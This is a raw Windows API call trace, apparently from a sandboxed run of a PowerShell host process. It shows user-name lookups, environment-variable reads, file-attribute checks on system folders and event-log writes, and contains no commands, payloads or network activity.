	[0103.997] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b33da00, nSize=0xed6e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed6e8) returned 0x1
	[0103.997] CoTaskMemFree (pv=0x1b33da00) 
	[0103.997] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0103.997] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed728 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed728) returned 1
	[0103.997] CoTaskMemFree (pv=0x22b7e0) 
	[0103.998] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd8be0*="Certificate", lpRawData=0x2dd8970) returned 1
	[0104.140] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.140] CoTaskMemFree (pv=0x28e290) 
	[0104.143] GetLogicalDrives () returned 0x4
	[0104.143] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xed370, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0104.143] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0104.144] CoTaskMemAlloc (cb=0x20e) returned 0x270fb0
	[0104.144] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x270fb0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0104.144] CoTaskMemFree (pv=0x270fb0) 
	[0104.146] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.146] CoTaskMemFree (pv=0x28e290) 
	[0104.146] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.146] CoTaskMemFree (pv=0x28e290) 
	[0104.163] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.163] CoTaskMemFree (pv=0x28e290) 
	[0104.165] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.165] CoTaskMemFree (pv=0x28e290) 
	[0104.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.165] SetErrorMode (uMode=0x1) returned 0x1
	[0104.165] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed330 | out: lpFileInformation=0xed330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0104.166] SetErrorMode (uMode=0x1) returned 0x1
	[0104.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.166] SetErrorMode (uMode=0x1) returned 0x1
	[0104.166] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed330 | out: lpFileInformation=0xed330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0104.166] SetErrorMode (uMode=0x1) returned 0x1
	[0104.166] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.166] CoTaskMemFree (pv=0x28e290) 
	[0104.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.170] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0104.170] SetErrorMode (uMode=0x1) returned 0x1
	[0104.170] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed2f0 | out: lpFileInformation=0xed2f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0104.170] SetErrorMode (uMode=0x1) returned 0x1
	[0104.170] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0104.170] SetErrorMode (uMode=0x1) returned 0x1
	[0104.170] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed2f0 | out: lpFileInformation=0xed2f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0104.170] SetErrorMode (uMode=0x1) returned 0x1
	[0104.170] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0104.171] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0104.171] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0104.171] SetErrorMode (uMode=0x1) returned 0x1
	[0104.171] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed2f0 | out: lpFileInformation=0xed2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0104.171] SetErrorMode (uMode=0x1) returned 0x1
	[0104.171] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0104.171] SetErrorMode (uMode=0x1) returned 0x1
	[0104.171] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed2f0 | out: lpFileInformation=0xed2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0104.171] SetErrorMode (uMode=0x1) returned 0x1
	[0104.171] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0104.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0104.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.172] SetErrorMode (uMode=0x1) returned 0x1
	[0104.172] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed2f0 | out: lpFileInformation=0xed2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0104.172] SetErrorMode (uMode=0x1) returned 0x1
	[0104.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.172] SetErrorMode (uMode=0x1) returned 0x1
	[0104.172] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed2f0 | out: lpFileInformation=0xed2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0104.172] SetErrorMode (uMode=0x1) returned 0x1
	[0104.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xecfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.173] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xed120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0104.173] SetErrorMode (uMode=0x1) returned 0x1
	[0104.173] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed330 | out: lpFileInformation=0xed330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0104.173] SetErrorMode (uMode=0x1) returned 0x1
	[0104.173] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xed120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0104.173] SetErrorMode (uMode=0x1) returned 0x1
	[0104.173] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed330 | out: lpFileInformation=0xed330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0104.173] SetErrorMode (uMode=0x1) returned 0x1
	[0104.173] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0104.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xed020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0104.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.173] SetErrorMode (uMode=0x1) returned 0x1
	[0104.174] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed330 | out: lpFileInformation=0xed330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0104.174] SetErrorMode (uMode=0x1) returned 0x1
	[0104.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.174] SetErrorMode (uMode=0x1) returned 0x1
	[0104.174] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed330 | out: lpFileInformation=0xed330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0104.174] SetErrorMode (uMode=0x1) returned 0x1
	[0104.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xed020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0104.176] SetErrorMode (uMode=0x1) returned 0x1
	[0104.176] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed5f0 | out: lpFileInformation=0xed5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0104.176] SetErrorMode (uMode=0x1) returned 0x1
	[0104.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.429] CoTaskMemAlloc (cb=0x804) returned 0x1b33da00
	[0104.429] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b33da00, nSize=0xed958 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xed958) returned 0x1
	[0104.429] CoTaskMemFree (pv=0x1b33da00) 
	[0104.429] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0104.429] GetUserNameW (in: lpBuffer=0x22b7e0, pcbBuffer=0xed998 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xed998) returned 1
	[0104.429] CoTaskMemFree (pv=0x22b7e0) 
	[0104.431] ReportEventW (hEventLog=0x1b800008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e118c8*="Available", lpRawData=0x2e11658) returned 1
	[0104.433] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.433] CoTaskMemFree (pv=0x28e290) 
	[0104.435] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0104.435] CoTaskMemFree (pv=0x28e290) 
	[0104.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.442] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.442] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0104.442] CoTaskMemFree (pv=0x28e290) 
	[0104.442] CoTaskMemAlloc (cb=0x104) returned 0x28e290
	[0104.442] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x28e290, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0104.442] CoTaskMemFree (pv=0x28e290) 
	[0104.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.444] GetCurrentProcessId () returned 0x808
	[0104.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0104.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
